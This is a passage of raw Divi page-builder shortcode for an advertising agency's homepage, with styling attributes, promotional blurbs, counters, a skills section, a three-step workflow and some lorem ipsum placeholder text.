icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" 